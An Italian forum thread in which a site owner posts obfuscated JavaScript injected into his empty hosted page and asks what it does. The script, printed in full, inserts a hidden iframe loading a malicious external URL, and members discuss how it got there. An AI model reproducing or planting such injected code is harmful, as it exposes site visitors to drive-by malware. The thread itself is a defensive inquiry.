Blog Hackerato Consigli !!!

Stato
Discussione chiusa ad ulteriori risposte.

signoredeltempo

Utente Silver
6 Marzo 2009
0
0
0
55
Ciao a tutti avevo comprato un dominio che volevo usare per un mio blog e poi ho deciso di non usarlo più. Adesso ho provato a ricollegarmi e ho trovato questo codice:


Codice:
<script type="text/javascript">var _0x7e8a=["\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x69\x66\x72\x61\x6D\x65","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x69\x6D\x67\x6E\x6F\x64\x65\x2E\x63\x6E\x2F\x73\x63\x72\x69\x70\x74\x2F\x69\x6E\x2E\x63\x67\x69","\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];b=document[_0x7e8a[0x1]](_0x7e8a[0x0])[0x0];i=document[_0x7e8a[0x3]](_0x7e8a[0x2]);i[_0x7e8a[0x6]](_0x7e8a[0x4],_0x7e8a[0x5]);i[_0x7e8a[0x6]](_0x7e8a[0x7],0x0);i[_0x7e8a[0x6]](_0x7e8a[0x8],0x0);i[_0x7e8a[0x6]](_0x7e8a[0x9],0x0);b[_0x7e8a[0xa]](i);</script>



Il bello è che Firefox neanche mi avvisa che c'è un virus... infatti mi è stato detto da un' amico.



Cosa fa questo codice ?
Come fare per accorgersi che un sito ha un virus ?
E sopratutto Come hanno fatto ad hackerrami il sito che era hostato su TopHost ed era vuoto ?!?!

Grazie a tutti :conigliomg:
 
Questo è un oggetto chiamato "HTMLIFrameElement".
Dovrebbe richiamare un iframe che punta non so dove. Non so come c'è arrivato li xD
 
Ma cosa sono quei codici ? Non si capisce niente :-/. Non lo si può tradurre in un linguaggio piu leggibile ?



Come potrebbe esserci arrivato li quel codice considerando che il sito era vuoto e quindi non aveva codice vulenrabile.

Uso anche Linux quindi escluderei virus rubapassword sul mio computer.


Esiste un antivirus/plugin per browser che mi avvisa quando trova un virus su un sito che sto visitando ?


Grazie mille
:angel:
 
si che si può ma preferisco non postarlo in chiaro.La tecnica utilizzata è l'offuscamento del codice,ovvero utilizzare apparenti caratteri/segni incomprensibili per non rendere facilmente leggibile il codice.Il sito era vuoto e non aveva codice vulnerabile?
sei su linux quindi magari ti salvi da virus,posso dirti che è un virus dato che avast (non a me) l'ha rilevato.
Antivirus per browser?non ti basta quello (eventualmente) che hai sul pc associato ad un utilizzo di internet con la testa?
 
Codice:
JScriptCodeDom.CodeParseException: Unexpected Operator:< , Line 1, Char 0 ---> System.Exception: Unexpected Operator:<
   at JScriptCodeDom.CodeParser.ParseLazyExpressionCore(Boolean bthrowerr) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 618
   at JScriptCodeDom.CodeParser.ParseLazyExpression(Boolean bthrowerr) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 472
   at JScriptCodeDom.CodeParser.ParseFullExpression(Boolean bthrowerror) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 647
   at JScriptCodeDom.CodeParser.InternalParseStatementCore() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 264
   at JScriptCodeDom.CodeParser.InternalParseStatement() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 137
   at JScriptCodeDom.CodeParser.ParseStatement() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 69
   at JScriptCodeDom.CodeParser.ParseBlock() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 59
   at JScriptCodeDom.CodeParser.Parse(String code) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 20
   --- End of inner exception stack trace ---
   at JScriptCodeDom.CodeParser.Parse(String code) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 26
   at JScriptProtector.Protector.Protect(String[] codes) in C:\backup\Code\JSE\JScriptProtector.Framework\Protector.cs:line 93
   at JScriptProtector.Protector.Protect(String code) in C:\backup\Code\JSE\JScriptProtector.Framework\Protector.cs:line 82
   at Jsps._Default.Button1_Click(Object sender, EventArgs e) in c:\inetpub\wwwroot\javascriptobfuscator.com\wwwroot\Default.aspx.cs:line 91


R4z0r_Cr4sH ha detto:
si che si può ma preferisco non postarlo in chiaro.

Perchè ?
Non è niente di che èh :omfg:
 
R4z0r_Cr4sH ha detto:
Antivirus per browser?non ti basta quello (eventualmente) che hai sul pc associato ad un utilizzo di internet con la testa?

Beh la testa la uso ma non posso guardare i sorgenti di ogni sito per capire se ha codice malevolo :-/ Tu come fai ?
Comunque non uso antivirus. Uso Linux


V1R5 ha detto:
Codice:
JScriptCodeDom.CodeParseException: Unexpected Operator:< , Line 1, Char 0 ---> System.Exception: Unexpected Operator:<
   at JScriptCodeDom.CodeParser.ParseLazyExpressionCore(Boolean bthrowerr) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 618
   at JScriptCodeDom.CodeParser.ParseLazyExpression(Boolean bthrowerr) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 472
   at JScriptCodeDom.CodeParser.ParseFullExpression(Boolean bthrowerror) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 647
   at JScriptCodeDom.CodeParser.InternalParseStatementCore() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 264
   at JScriptCodeDom.CodeParser.InternalParseStatement() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 137
   at JScriptCodeDom.CodeParser.ParseStatement() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 69
   at JScriptCodeDom.CodeParser.ParseBlock() in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 59
   at JScriptCodeDom.CodeParser.Parse(String code) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 20
   --- End of inner exception stack trace ---
   at JScriptCodeDom.CodeParser.Parse(String code) in C:\backup\Code\JSE\JScriptProtector.Framework\JScriptCodeDom\Parser.cs:line 26
   at JScriptProtector.Protector.Protect(String[] codes) in C:\backup\Code\JSE\JScriptProtector.Framework\Protector.cs:line 93
   at JScriptProtector.Protector.Protect(String code) in C:\backup\Code\JSE\JScriptProtector.Framework\Protector.cs:line 82
   at Jsps._Default.Button1_Click(Object sender, EventArgs e) in c:\inetpub\wwwroot\javascriptobfuscator.com\wwwroot\Default.aspx.cs:line 91


R4z0r_Cr4sH ha detto:
si che si può ma preferisco non postarlo in chiaro.

Perchè ?
Non è niente di che èh :omfg:



ehm... ma che roba è ? :blush:
 
mi sa che ho capito di che si tratta ma per principio non posto il sorgente in chiaro...almeno io!Usi linux,allora di che ti preoccupi?
 
R4z0r_Cr4sH ha detto:
mi sa che ho capito di che si tratta ma per principio non posto il sorgente in chiaro...almeno io!Usi linux,allora di che ti preoccupi?

Beh perchè se visito un sito con un virus almeno non lo faccio visitare ai miei amici windowsiani :-/
 
vuoi davvero aiutare ?
vai sul sito incriminato con linux e tramite il modulo apposito di firefox segnalalo come pericoloso, in questo modo gli utenti di firefox verranno bloccati prima...
 
RedSkull ha detto:
vuoi davvero aiutare ?
vai sul sito incriminato con linux e tramite il modulo apposito di firefox segnalalo come pericoloso, in questo modo gli utenti di firefox verranno bloccati prima...

Ok ma volevo sapere voi come fate per sapere che un sito ha un virus o no!!
:blush:

Vabeh lo tradotto io:
In pratica crea un' iframe e la pagina incriminata è questa:

http://imgnode.cn/script/in.cgi

ho googlato è dicono che sia un virus. A me restituisce una pagina bianca.
Qualcuno lo può segnalare ? io non so farlo :blush:
 
il mio chrome mi ha calciorotato fuori dal sito :asd:

cmq: se è un sito affidabile, sai che nn ha virus, se nn è affidabile, o nn ci vai, o dai una controllata. Ah, cmq, esistono virus anche per linux, anche se sono + rari, ed in genere sfruttano l'impreparazione dell'utente. Un classico esempio, è chi accede da root per comodità e poi si lamentano magari, che uno script ha lanciato rm -rf / (è successo ad uno che net-conosco... un co****** nato sinceramente)
 
dal momento che non c'era sito i casi sno due mi sembra...
o è stato infettato il server da un programmino che scrive questo codice in ogni index di ogni sito presente su di esso oppure uno stro*** ha ottenuto l'accesso al server e ti ha infettato la pagina manualmente..
.. se è un server condiviso interroga qualche db whois e scopri gli altri siti hostati, guardane i sorgenti e controlla se il codice è presente anche in questi e eventualmente avverti i tuoi padroni di casa...
 
Non ho usato password semplice e gli altri siti hostati ( sono 4 in tutto ) non sono stati minimamente toccati.

Il sito è hostato su un server famoso ed economico ( inizia con la T ) :conigliomg:
 
quale cms usavi?

il blog aveva wordpress aggiornato?

il lamer ha sicuramente trovato il bug e sostituito tutte le index con quel codice...

non c'entra nulla il virus nel tuo pc.
 
Langy ha detto:
quale cms usavi?

il blog aveva wordpress aggiornato?

il lamer ha sicuramente trovato il bug e sostituito tutte le index con quel codice...

non c'entra nulla il virus nel tuo pc.

Nessun CMS... il sito era VUOTO !! C'era solo la index in html :angel:
 
signoredeltempo ha detto:
Langy ha detto:
quale cms usavi?

il blog aveva wordpress aggiornato?

il lamer ha sicuramente trovato il bug e sostituito tutte le index con quel codice...

non c'entra nulla il virus nel tuo pc.

Nessun CMS... il sito era VUOTO !! C'era solo la index in html :angel:

e allora e' stato fatto un massdeface al tuo hosting
 
Langy ha detto:
signoredeltempo ha detto:
Langy ha detto:
quale cms usavi?

il blog aveva wordpress aggiornato?

il lamer ha sicuramente trovato il bug e sostituito tutte le index con quel codice...

non c'entra nulla il virus nel tuo pc.

Nessun CMS... il sito era VUOTO !! C'era solo la index in html :angel:

e allora e' stato fatto un massdeface al tuo hosting

Infatti lo immaginavo volevo solo la conferma :conigliomg:
 
Stato
Discussione chiusa ad ulteriori risposte.